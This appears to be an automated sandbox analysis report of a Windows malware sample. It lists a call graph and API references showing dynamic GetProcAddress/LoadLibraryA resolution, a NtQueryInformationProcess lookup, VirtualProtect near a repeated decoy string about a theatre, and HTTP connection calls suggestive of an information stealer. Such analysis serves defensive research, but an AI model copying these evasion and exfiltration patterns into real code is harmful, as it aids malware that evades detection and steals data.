1645c0 2 API calls 14104->14105 14106 163159 14105->14106 14107 1645c0 2 API calls 14106->14107 14108 163172 14107->14108 14109 1645c0 2 API calls 14108->14109 14110 16318b 14109->14110 14111 1645c0 2 API calls 14110->14111 14112 1631a4 14111->14112 14113 1645c0 2 API calls 14112->14113 14114 1631bd 14113->14114 14115 1645c0 2 API calls 14114->14115 14116 1631d6 14115->14116 14117 1645c0 2 API calls 14116->14117 14118 1631ef 14117->14118 14119 1645c0 2 API calls 14118->14119 14120 163208 14119->14120 14121 1645c0 2 API calls 14120->14121 14122 163221 14121->14122 14123 1645c0 2 API calls 14122->14123 14124 16323a 14123->14124 14125 1645c0 2 API calls 14124->14125 14126 163253 14125->14126 14127 1645c0 2 API calls 14126->14127 14128 16326c 14127->14128 14129 1645c0 2 API calls 14128->14129 14130 163285 14129->14130 14131 1645c0 2 API calls 14130->14131 14132 16329e 14131->14132 14133 1645c0 2 API calls 14132->14133 14134 1632b7 14133->14134 14135 1645c0 2 API calls 
14134->14135 14136 1632d0 14135->14136 14137 1645c0 2 API calls 14136->14137 14138 1632e9 14137->14138 14139 1645c0 2 API calls 14138->14139 14140 163302 14139->14140 14141 1645c0 2 API calls 14140->14141 14142 16331b 14141->14142 14143 1645c0 2 API calls 14142->14143 14144 163334 14143->14144 14145 1645c0 2 API calls 14144->14145 14146 16334d 14145->14146 14147 1645c0 2 API calls 14146->14147 14148 163366 14147->14148 14149 1645c0 2 API calls 14148->14149 14150 16337f 14149->14150 14151 1645c0 2 API calls 14150->14151 14152 163398 14151->14152 14153 1645c0 2 API calls 14152->14153 14154 1633b1 14153->14154 14155 1645c0 2 API calls 14154->14155 14156 1633ca 14155->14156 14157 1645c0 2 API calls 14156->14157 14158 1633e3 14157->14158 14159 1645c0 2 API calls 14158->14159 14160 1633fc 14159->14160 14161 1645c0 2 API calls 14160->14161 14162 163415 14161->14162 14163 1645c0 2 API calls 14162->14163 14164 16342e 14163->14164 14165 1645c0 2 API calls 14164->14165 14166 163447 14165->14166 14167 1645c0 2 API calls 14166->14167 14168 163460 14167->14168 14169 1645c0 2 API calls 14168->14169 14170 163479 14169->14170 14171 1645c0 2 API calls 14170->14171 14172 163492 14171->14172 14173 1645c0 2 API calls 14172->14173 14174 1634ab 14173->14174 14175 1645c0 2 API calls 14174->14175 14176 1634c4 14175->14176 14177 1645c0 2 API calls 14176->14177 14178 1634dd 14177->14178 14179 1645c0 2 API calls 14178->14179 14180 1634f6 14179->14180 14181 1645c0 2 API calls 14180->14181 14182 16350f 14181->14182 14183 1645c0 2 API calls 14182->14183 14184 163528 14183->14184 14185 1645c0 2 API calls 14184->14185 14186 163541 14185->14186 14187 1645c0 2 API calls 14186->14187 14188 16355a 14187->14188 14189 1645c0 2 API calls 14188->14189 14190 163573 14189->14190 14191 1645c0 2 API calls 14190->14191 14192 16358c 14191->14192 14193 1645c0 2 API calls 14192->14193 14194 1635a5 14193->14194 14195 1645c0 2 API calls 14194->14195 14196 1635be 14195->14196 14197 1645c0 2 API calls 14196->14197 
14198 1635d7 14197->14198 14199 1645c0 2 API calls 14198->14199 14200 1635f0 14199->14200 14201 1645c0 2 API calls 14200->14201 14202 163609 14201->14202 14203 1645c0 2 API calls 14202->14203 14204 163622 14203->14204 14205 1645c0 2 API calls 14204->14205 14206 16363b 14205->14206 14207 1645c0 2 API calls 14206->14207 14208 163654 14207->14208 14209 1645c0 2 API calls 14208->14209 14210 16366d 14209->14210 14211 1645c0 2 API calls 14210->14211 14212 163686 14211->14212 14213 1645c0 2 API calls 14212->14213 14214 16369f 14213->14214 14215 1645c0 2 API calls 14214->14215 14216 1636b8 14215->14216 14217 1645c0 2 API calls 14216->14217 14218 1636d1 14217->14218 14219 1645c0 2 API calls 14218->14219 14220 1636ea 14219->14220 14221 1645c0 2 API calls 14220->14221 14222 163703 14221->14222 14223 1645c0 2 API calls 14222->14223 14224 16371c 14223->14224 14225 1645c0 2 API calls 14224->14225 14226 163735 14225->14226 14227 1645c0 2 API calls 14226->14227 14228 16374e 14227->14228 14229 1645c0 2 API calls 14228->14229 14230 163767 14229->14230 14231 1645c0 2 API calls 14230->14231 14232 163780 14231->14232 14233 1645c0 2 API calls 14232->14233 14234 163799 14233->14234 14235 1645c0 2 API calls 14234->14235 14236 1637b2 14235->14236 14237 1645c0 2 API calls 14236->14237 14238 1637cb 14237->14238 14239 1645c0 2 API calls 14238->14239 14240 1637e4 14239->14240 14241 1645c0 2 API calls 14240->14241 14242 1637fd 14241->14242 14243 1645c0 2 API calls 14242->14243 14244 163816 14243->14244 14245 1645c0 2 API calls 14244->14245 14246 16382f 14245->14246 14247 1645c0 2 API calls 14246->14247 14248 163848 14247->14248 14249 1645c0 2 API calls 14248->14249 14250 163861 14249->14250 14251 1645c0 2 API calls 14250->14251 14252 16387a 14251->14252 14253 1645c0 2 API calls 14252->14253 14254 163893 14253->14254 14255 1645c0 2 API calls 14254->14255 14256 1638ac 14255->14256 14257 1645c0 2 API calls 14256->14257 14258 1638c5 14257->14258 14259 1645c0 2 API calls 14258->14259 14260 1638de 
14259->14260 14261 1645c0 2 API calls 14260->14261 14262 1638f7 14261->14262 14263 1645c0 2 API calls 14262->14263 14264 163910 14263->14264 14265 1645c0 2 API calls 14264->14265 14266 163929 14265->14266 14267 1645c0 2 API calls 14266->14267 14268 163942 14267->14268 14269 1645c0 2 API calls 14268->14269 14270 16395b 14269->14270 14271 1645c0 2 API calls 14270->14271 14272 163974 14271->14272 14273 1645c0 2 API calls 14272->14273 14274 16398d 14273->14274 14275 1645c0 2 API calls 14274->14275 14276 1639a6 14275->14276 14277 1645c0 2 API calls 14276->14277 14278 1639bf 14277->14278 14279 1645c0 2 API calls 14278->14279 14280 1639d8 14279->14280 14281 1645c0 2 API calls 14280->14281 14282 1639f1 14281->14282 14283 1645c0 2 API calls 14282->14283 14284 163a0a 14283->14284 14285 1645c0 2 API calls 14284->14285 14286 163a23 14285->14286 14287 1645c0 2 API calls 14286->14287 14288 163a3c 14287->14288 14289 1645c0 2 API calls 14288->14289 14290 163a55 14289->14290 14291 1645c0 2 API calls 14290->14291 14292 163a6e 14291->14292 14293 1645c0 2 API calls 14292->14293 14294 163a87 14293->14294 14295 1645c0 2 API calls 14294->14295 14296 163aa0 14295->14296 14297 1645c0 2 API calls 14296->14297 14298 163ab9 14297->14298 14299 1645c0 2 API calls 14298->14299 14300 163ad2 14299->14300 14301 1645c0 2 API calls 14300->14301 14302 163aeb 14301->14302 14303 1645c0 2 API calls 14302->14303 14304 163b04 14303->14304 14305 1645c0 2 API calls 14304->14305 14306 163b1d 14305->14306 14307 1645c0 2 API calls 14306->14307 14308 163b36 14307->14308 14309 1645c0 2 API calls 14308->14309 14310 163b4f 14309->14310 14311 1645c0 2 API calls 14310->14311 14312 163b68 14311->14312 14313 1645c0 2 API calls 14312->14313 14314 163b81 14313->14314 14315 1645c0 2 API calls 14314->14315 14316 163b9a 14315->14316 14317 1645c0 2 API calls 14316->14317 14318 163bb3 14317->14318 14319 1645c0 2 API calls 14318->14319 14320 163bcc 14319->14320 14321 1645c0 2 API calls 14320->14321 14322 163be5 14321->14322 
14323 1645c0 2 API calls 14322->14323 14324 163bfe 14323->14324 14325 1645c0 2 API calls 14324->14325 14326 163c17 14325->14326 14327 1645c0 2 API calls 14326->14327 14328 163c30 14327->14328 14329 1645c0 2 API calls 14328->14329 14330 163c49 14329->14330 14331 1645c0 2 API calls 14330->14331 14332 163c62 14331->14332 14333 1645c0 2 API calls 14332->14333 14334 163c7b 14333->14334 14335 1645c0 2 API calls 14334->14335 14336 163c94 14335->14336 14337 1645c0 2 API calls 14336->14337 14338 163cad 14337->14338 14339 1645c0 2 API calls 14338->14339 14340 163cc6 14339->14340 14341 1645c0 2 API calls 14340->14341 14342 163cdf 14341->14342 14343 1645c0 2 API calls 14342->14343 14344 163cf8 14343->14344 14345 1645c0 2 API calls 14344->14345 14346 163d11 14345->14346 14347 1645c0 2 API calls 14346->14347 14348 163d2a 14347->14348 14349 1645c0 2 API calls 14348->14349 14350 163d43 14349->14350 14351 1645c0 2 API calls 14350->14351 14352 163d5c 14351->14352 14353 1645c0 2 API calls 14352->14353 14354 163d75 14353->14354 14355 1645c0 2 API calls 14354->14355 14356 163d8e 14355->14356 14357 1645c0 2 API calls 14356->14357 14358 163da7 14357->14358 14359 1645c0 2 API calls 14358->14359 14360 163dc0 14359->14360 14361 1645c0 2 API calls 14360->14361 14362 163dd9 14361->14362 14363 1645c0 2 API calls 14362->14363 14364 163df2 14363->14364 14365 1645c0 2 API calls 14364->14365 14366 163e0b 14365->14366 14367 1645c0 2 API calls 14366->14367 14368 163e24 14367->14368 14369 1645c0 2 API calls 14368->14369 14370 163e3d 14369->14370 14371 1645c0 2 API calls 14370->14371 14372 163e56 14371->14372 14373 1645c0 2 API calls 14372->14373 14374 163e6f 14373->14374 14375 1645c0 2 API calls 14374->14375 14376 163e88 14375->14376 14377 1645c0 2 API calls 14376->14377 14378 163ea1 14377->14378 14379 1645c0 2 API calls 14378->14379 14380 163eba 14379->14380 14381 1645c0 2 API calls 14380->14381 14382 163ed3 14381->14382 14383 1645c0 2 API calls 14382->14383 14384 163eec 14383->14384 14385 1645c0 2 
API calls 14384->14385 14386 163f05 14385->14386 14387 1645c0 2 API calls 14386->14387 14388 163f1e 14387->14388 14389 1645c0 2 API calls 14388->14389 14390 163f37 14389->14390 14391 1645c0 2 API calls 14390->14391 14392 163f50 14391->14392 14393 1645c0 2 API calls 14392->14393 14394 163f69 14393->14394 14395 1645c0 2 API calls 14394->14395 14396 163f82 14395->14396 14397 1645c0 2 API calls 14396->14397 14398 163f9b 14397->14398 14399 1645c0 2 API calls 14398->14399 14400 163fb4 14399->14400 14401 1645c0 2 API calls 14400->14401 14402 163fcd 14401->14402 14403 1645c0 2 API calls 14402->14403 14404 163fe6 14403->14404 14405 1645c0 2 API calls 14404->14405 14406 163fff 14405->14406 14407 1645c0 2 API calls 14406->14407 14408 164018 14407->14408 14409 1645c0 2 API calls 14408->14409 14410 164031 14409->14410 14411 1645c0 2 API calls 14410->14411 14412 16404a 14411->14412 14413 1645c0 2 API calls 14412->14413 14414 164063 14413->14414 14415 1645c0 2 API calls 14414->14415 14416 16407c 14415->14416 14417 1645c0 2 API calls 14416->14417 14418 164095 14417->14418 14419 1645c0 2 API calls 14418->14419 14420 1640ae 14419->14420 14421 1645c0 2 API calls 14420->14421 14422 1640c7 14421->14422 14423 1645c0 2 API calls 14422->14423 14424 1640e0 14423->14424 14425 1645c0 2 API calls 14424->14425 14426 1640f9 14425->14426 14427 1645c0 2 API calls 14426->14427 14428 164112 14427->14428 14429 1645c0 2 API calls 14428->14429 14430 16412b 14429->14430 14431 1645c0 2 API calls 14430->14431 14432 164144 14431->14432 14433 1645c0 2 API calls 14432->14433 14434 16415d 14433->14434 14435 1645c0 2 API calls 14434->14435 14436 164176 14435->14436 14437 1645c0 2 API calls 14436->14437 14438 16418f 14437->14438 14439 1645c0 2 API calls 14438->14439 14440 1641a8 14439->14440 14441 1645c0 2 API calls 14440->14441 14442 1641c1 14441->14442 14443 1645c0 2 API calls 14442->14443 14444 1641da 14443->14444 14445 1645c0 2 API calls 14444->14445 14446 1641f3 14445->14446 14447 1645c0 2 API calls 
14446->14447 14448 16420c 14447->14448 14449 1645c0 2 API calls 14448->14449 14450 164225 14449->14450 14451 1645c0 2 API calls 14450->14451 14452 16423e 14451->14452 14453 1645c0 2 API calls 14452->14453 14454 164257 14453->14454 14455 1645c0 2 API calls 14454->14455 14456 164270 14455->14456 14457 1645c0 2 API calls 14456->14457 14458 164289 14457->14458 14459 1645c0 2 API calls 14458->14459 14460 1642a2 14459->14460 14461 1645c0 2 API calls 14460->14461 14462 1642bb 14461->14462 14463 1645c0 2 API calls 14462->14463 14464 1642d4 14463->14464 14465 1645c0 2 API calls 14464->14465 14466 1642ed 14465->14466 14467 1645c0 2 API calls 14466->14467 14468 164306 14467->14468 14469 1645c0 2 API calls 14468->14469 14470 16431f 14469->14470 14471 1645c0 2 API calls 14470->14471 14472 164338 14471->14472 14473 1645c0 2 API calls 14472->14473 14474 164351 14473->14474 14475 1645c0 2 API calls 14474->14475 14476 16436a 14475->14476 14477 1645c0 2 API calls 14476->14477 14478 164383 14477->14478 14479 1645c0 2 API calls 14478->14479 14480 16439c 14479->14480 14481 1645c0 2 API calls 14480->14481 14482 1643b5 14481->14482 14483 1645c0 2 API calls 14482->14483 14484 1643ce 14483->14484 14485 1645c0 2 API calls 14484->14485 14486 1643e7 14485->14486 14487 1645c0 2 API calls 14486->14487 14488 164400 14487->14488 14489 1645c0 2 API calls 14488->14489 14490 164419 14489->14490 14491 1645c0 2 API calls 14490->14491 14492 164432 14491->14492 14493 1645c0 2 API calls 14492->14493 14494 16444b 14493->14494 14495 1645c0 2 API calls 14494->14495 14496 164464 14495->14496 14497 1645c0 2 API calls 14496->14497 14498 16447d 14497->14498 14499 1645c0 2 API calls 14498->14499 14500 164496 14499->14500 14501 1645c0 2 API calls 14500->14501 14502 1644af 14501->14502 14503 1645c0 2 API calls 14502->14503 14504 1644c8 14503->14504 14505 1645c0 2 API calls 14504->14505 14506 1644e1 14505->14506 14507 1645c0 2 API calls 14506->14507 14508 1644fa 14507->14508 14509 1645c0 2 API calls 14508->14509 
14510 164513 14509->14510 14511 1645c0 2 API calls 14510->14511 14512 16452c 14511->14512 14513 1645c0 2 API calls 14512->14513 14514 164545 14513->14514 14515 1645c0 2 API calls 14514->14515 14516 16455e 14515->14516 14517 1645c0 2 API calls 14516->14517 14518 164577 14517->14518 14519 1645c0 2 API calls 14518->14519 14520 164590 14519->14520 14521 1645c0 2 API calls 14520->14521 14522 1645a9 14521->14522 14523 179c10 14522->14523 14524 17a036 8 API calls 14523->14524 14525 179c20 43 API calls 14523->14525 14526 17a146 14524->14526 14527 17a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14524->14527 14525->14524 14528 17a216 14526->14528 14529 17a153 8 API calls 14526->14529 14527->14526 14530 17a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14528->14530 14531 17a298 14528->14531 14529->14528 14530->14531 14532 17a337 14531->14532 14533 17a2a5 6 API calls 14531->14533 14534 17a344 9 API calls 14532->14534 14535 17a41f 14532->14535 14533->14532 14534->14535 14536 17a4a2 14535->14536 14537 17a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14535->14537 14538 17a4dc 14536->14538 14539 17a4ab GetProcAddress GetProcAddress 14536->14539 14537->14536 14540 17a515 14538->14540 14541 17a4e5 GetProcAddress GetProcAddress 14538->14541 14539->14538 14542 17a612 14540->14542 14543 17a522 10 API calls 14540->14543 14541->14540 14544 17a67d 14542->14544 14545 17a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14542->14545 14543->14542 14546 17a686 GetProcAddress 14544->14546 14547 17a69e 14544->14547 14545->14544 14546->14547 14548 17a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14547->14548 14549 175ca3 14547->14549 14548->14549 14550 161590 14549->14550 15671 161670 14550->15671 14553 17a7a0 lstrcpy 14554 1615b5 14553->14554 14555 17a7a0 lstrcpy 14554->14555 14556 1615c7 14555->14556 14557 17a7a0 lstrcpy 14556->14557 14558 1615d9 14557->14558 14559 
17a7a0 lstrcpy 14558->14559 14560 161663 14559->14560 14561 175510 14560->14561 14562 175521 14561->14562 14563 17a820 2 API calls 14562->14563 14564 17552e 14563->14564 14565 17a820 2 API calls 14564->14565 14566 17553b 14565->14566 14567 17a820 2 API calls 14566->14567 14568 175548 14567->14568 14569 17a740 lstrcpy 14568->14569 14570 175555 14569->14570 14571 17a740 lstrcpy 14570->14571 14572 175562 14571->14572 14573 17a740 lstrcpy 14572->14573 14574 17556f 14573->14574 14575 17a740 lstrcpy 14574->14575 14576 17557c 14575->14576 14577 1751f0 20 API calls 14576->14577 14578 175643 StrCmpCA 14576->14578 14579 1756a0 StrCmpCA 14576->14579 14584 17a740 lstrcpy 14576->14584 14585 17a820 lstrlen lstrcpy 14576->14585 14587 175856 StrCmpCA 14576->14587 14590 17a8a0 lstrcpy 14576->14590 14597 175a0b StrCmpCA 14576->14597 14605 161590 lstrcpy 14576->14605 14608 1752c0 25 API calls 14576->14608 14610 17578a StrCmpCA 14576->14610 14614 17593f StrCmpCA 14576->14614 14615 17a7a0 lstrcpy 14576->14615 14577->14576 14578->14576 14579->14576 14580 1757dc 14579->14580 14581 17a8a0 lstrcpy 14580->14581 14582 1757e8 14581->14582 14583 17a820 2 API calls 14582->14583 14586 1757f6 14583->14586 14584->14576 14585->14576 14588 17a820 2 API calls 14586->14588 14587->14576 14589 175991 14587->14589 14592 175805 14588->14592 14591 17a8a0 lstrcpy 14589->14591 14590->14576 14593 17599d 14591->14593 14594 161670 lstrcpy 14592->14594 14595 17a820 2 API calls 14593->14595 14613 175811 14594->14613 14596 1759ab 14595->14596 14598 17a820 2 API calls 14596->14598 14599 175a16 Sleep 14597->14599 14600 175a28 14597->14600 14601 1759ba 14598->14601 14599->14576 14602 17a8a0 lstrcpy 14600->14602 14603 161670 lstrcpy 14601->14603 14604 175a34 14602->14604 14603->14613 14606 17a820 2 API calls 14604->14606 14605->14576 14607 175a43 14606->14607 14609 17a820 2 API calls 14607->14609 14608->14576 14611 175a52 14609->14611 14610->14576 14612 161670 lstrcpy 14611->14612 14612->14613 14613->13668 
14614->14576 14615->14576 14617 177553 GetVolumeInformationA 14616->14617 14618 17754c 14616->14618 14619 177591 14617->14619 14618->14617 14620 1775fc GetProcessHeap RtlAllocateHeap 14619->14620 14621 177619 14620->14621 14622 177628 wsprintfA 14620->14622 14623 17a740 lstrcpy 14621->14623 14624 17a740 lstrcpy 14622->14624 14625 175da7 14623->14625 14624->14625 14625->13689 14627 17a7a0 lstrcpy 14626->14627 14628 164899 14627->14628 15680 1647b0 14628->15680 14630 1648a5 14631 17a740 lstrcpy 14630->14631 14632 1648d7 14631->14632 14633 17a740 lstrcpy 14632->14633 14634 1648e4 14633->14634 14635 17a740 lstrcpy 14634->14635 14636 1648f1 14635->14636 14637 17a740 lstrcpy 14636->14637 14638 1648fe 14637->14638 14639 17a740 lstrcpy 14638->14639 14640 16490b InternetOpenA StrCmpCA 14639->14640 14641 164944 14640->14641 14642 164ecb InternetCloseHandle 14641->14642 15686 178b60 14641->15686 14644 164ee8 14642->14644 15701 169ac0 CryptStringToBinaryA 14644->15701 14645 164963 15694 17a920 14645->15694 14649 164976 14650 17a8a0 lstrcpy 14649->14650 14655 16497f 14650->14655 14651 17a820 2 API calls 14652 164f05 14651->14652 14653 17a9b0 4 API calls 14652->14653 14656 164f1b 14653->14656 14654 164f27 codecvt 14658 17a7a0 lstrcpy 14654->14658 14659 17a9b0 4 API calls 14655->14659 14657 17a8a0 lstrcpy 14656->14657 14657->14654 14662 164f57 14658->14662 14660 1649a9 14659->14660 14661 17a8a0 lstrcpy 14660->14661 14663 1649b2 14661->14663 14662->13692 14664 17a9b0 4 API calls 14663->14664 14665 1649d1 14664->14665 14666 17a8a0 lstrcpy 14665->14666 14667 1649da 14666->14667 14668 17a920 3 API calls 14667->14668 14669 1649f8 14668->14669 14670 17a8a0 lstrcpy 14669->14670 14671 164a01 14670->14671 14672 17a9b0 4 API calls 14671->14672 14673 164a20 14672->14673 14674 17a8a0 lstrcpy 14673->14674 14675 164a29 14674->14675 14676 17a9b0 4 API calls 14675->14676 14677 164a48 14676->14677 14678 17a8a0 lstrcpy 14677->14678 14679 164a51 14678->14679 14680 17a9b0 4 API calls 14679->14680 
14681 164a7d 14680->14681 14682 17a920 3 API calls 14681->14682 14683 164a84 14682->14683 14684 17a8a0 lstrcpy 14683->14684 14685 164a8d 14684->14685 14686 164aa3 InternetConnectA 14685->14686 14686->14642 14687 164ad3 HttpOpenRequestA 14686->14687 14689 164ebe InternetCloseHandle 14687->14689 14690 164b28 14687->14690 14689->14642 14691 17a9b0 4 API calls 14690->14691 14692 164b3c 14691->14692 14693 17a8a0 lstrcpy 14692->14693 14694 164b45 14693->14694 14695 17a920 3 API calls 14694->14695 14696 164b63 14695->14696 14697 17a8a0 lstrcpy 14696->14697 14698 164b6c 14697->14698 14699 17a9b0 4 API calls 14698->14699 14700 164b8b 14699->14700 14701 17a8a0 lstrcpy 14700->14701 14702 164b94 14701->14702 14703 17a9b0 4 API calls 14702->14703 14704 164bb5 14703->14704 14705 17a8a0 lstrcpy 14704->14705 14706 164bbe 14705->14706 14707 17a9b0 4 API calls 14706->14707 14708 164bde 14707->14708 14709 17a8a0 lstrcpy 14708->14709 14710 164be7 14709->14710 14711 17a9b0 4 API calls 14710->14711 14712 164c06 14711->14712 14713 17a8a0 lstrcpy 14712->14713 14714 164c0f 14713->14714 14715 17a920 3 API calls 14714->14715 14716 164c2d 14715->14716 14717 17a8a0 lstrcpy 14716->14717 14718 164c36 14717->14718 14719 17a9b0 4 API calls 14718->14719 14720 164c55 14719->14720 14721 17a8a0 lstrcpy 14720->14721 14722 164c5e 14721->14722 14723 17a9b0 4 API calls 14722->14723 14724 164c7d 14723->14724 14725 17a8a0 lstrcpy 14724->14725 14726 164c86 14725->14726 14727 17a920 3 API calls 14726->14727 14728 164ca4 14727->14728 14729 17a8a0 lstrcpy 14728->14729 14730 164cad 14729->14730 14731 17a9b0 4 API calls 14730->14731 14732 164ccc 14731->14732 14733 17a8a0 lstrcpy 14732->14733 14734 164cd5 14733->14734 14735 17a9b0 4 API calls 14734->14735 14736 164cf6 14735->14736 14737 17a8a0 lstrcpy 14736->14737 14738 164cff 14737->14738 14739 17a9b0 4 API calls 14738->14739 14740 164d1f 14739->14740 14741 17a8a0 lstrcpy 14740->14741 14742 164d28 14741->14742 14743 17a9b0 4 API calls 14742->14743 14744 164d47 

                          Control-flow Graph

                          APIs
                          • GetProcAddress.KERNEL32(76210000,00CC1738), ref: 001798A1
                          • GetProcAddress.KERNEL32(76210000,00CC1528), ref: 001798BA
                          • GetProcAddress.KERNEL32(76210000,00CC15A0), ref: 001798D2
                          • GetProcAddress.KERNEL32(76210000,00CC15D0), ref: 001798EA
                          • GetProcAddress.KERNEL32(76210000,00CC1540), ref: 00179903
                          • GetProcAddress.KERNEL32(76210000,00CC9478), ref: 0017991B
                          • GetProcAddress.KERNEL32(76210000,00CB64A0), ref: 00179933
                          • GetProcAddress.KERNEL32(76210000,00CB62E0), ref: 0017994C
                          • GetProcAddress.KERNEL32(76210000,00CC1648), ref: 00179964
                          • GetProcAddress.KERNEL32(76210000,00CC1588), ref: 0017997C
                          • GetProcAddress.KERNEL32(76210000,00CC1600), ref: 00179995
                          • GetProcAddress.KERNEL32(76210000,00CC1750), ref: 001799AD
                          • GetProcAddress.KERNEL32(76210000,00CB6320), ref: 001799C5
                          • GetProcAddress.KERNEL32(76210000,00CC17B0), ref: 001799DE
                          • GetProcAddress.KERNEL32(76210000,00CC1618), ref: 001799F6
                          • GetProcAddress.KERNEL32(76210000,00CB6580), ref: 00179A0E
                          • GetProcAddress.KERNEL32(76210000,00CC1660), ref: 00179A27
                          • GetProcAddress.KERNEL32(76210000,00CC1678), ref: 00179A3F
                          • GetProcAddress.KERNEL32(76210000,00CB6660), ref: 00179A57
                          • GetProcAddress.KERNEL32(76210000,00CC1840), ref: 00179A70
                          • GetProcAddress.KERNEL32(76210000,00CB6640), ref: 00179A88
                          • LoadLibraryA.KERNEL32(00CC1810,?,00176A00), ref: 00179A9A
                          • LoadLibraryA.KERNEL32(00CC1828,?,00176A00), ref: 00179AAB
                          • LoadLibraryA.KERNEL32(00CC18B8,?,00176A00), ref: 00179ABD
                          • LoadLibraryA.KERNEL32(00CC18D0,?,00176A00), ref: 00179ACF
                          • LoadLibraryA.KERNEL32(00CC1858,?,00176A00), ref: 00179AE0
                          • GetProcAddress.KERNEL32(75B30000,00CC1870), ref: 00179B02
                          • GetProcAddress.KERNEL32(751E0000,00CC1888), ref: 00179B23
                          • GetProcAddress.KERNEL32(751E0000,00CC18A0), ref: 00179B3B
                          • GetProcAddress.KERNEL32(76910000,00CC9528), ref: 00179B5D
                          • GetProcAddress.KERNEL32(75670000,00CB6620), ref: 00179B7E
                          • GetProcAddress.KERNEL32(77310000,00CC93F8), ref: 00179B9F
                          • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00179BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00179BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 33ea2a2d70caed5f8385dd6516eb570461fbceba00f2355581df79e7e9d821c1
                          • Instruction ID: 8b0e949d21c7597bbe8a8040436cf3f31449dfecfae4e38db47bad4634817a4d
                          • Opcode Fuzzy Hash: 33ea2a2d70caed5f8385dd6516eb570461fbceba00f2355581df79e7e9d821c1
                          • Instruction Fuzzy Hash: BFA16FB7500A109FD397DFA8ED88A663BFDF74E301F04851AA615C3264D73A9841DF12

                          Control-flow Graph

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0016460F
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0016479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001646C2, 0016473F, 001645C7, 00164657, 001645F3, 0016466D, 00164729, 00164617, 00164734, 001645DD, 00164662, 0016462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0016477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001646B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001645D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0016474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0016471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001646CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001646D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0016475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00164638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001646AC
